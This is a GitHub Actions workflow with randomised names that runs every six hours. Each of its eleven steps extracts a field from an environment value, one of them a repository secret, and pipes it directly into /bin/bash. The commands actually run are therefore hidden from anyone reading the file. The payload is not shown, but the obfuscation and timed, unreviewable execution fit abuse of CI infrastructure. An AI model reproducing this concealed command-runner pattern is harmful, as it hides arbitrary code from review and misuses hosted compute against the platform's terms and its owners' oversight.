name: pengqi19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '54 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pengqi19871010
        env:
          xhul2449: ${{ secrets.xhul2449 }}
        run: |
          echo $xhul2449 | jq -r .wup45653 | /bin/bash
          echo $hquxw767 | jq -r .gp88 | /bin/bash
          echo $ixf39737 | jq -r .neo8563 | /bin/bash
          echo $rmu07 | jq -r .gmtz19727 | /bin/bash
          echo $qa9615 | jq -r .lrltc17283 | /bin/bash
          echo $pihoo83696 | jq -r .s37013 | /bin/bash
          echo $lt55 | jq -r .vw88188 | /bin/bash
          echo $weza75 | jq -r .xeswa9622 | /bin/bash
          echo $x801 | jq -r .kgu3098 | /bin/bash
          echo $z7540 | jq -r .rd3 | /bin/bash
          echo $ja88349 | jq -r .wt76 | /bin/bash

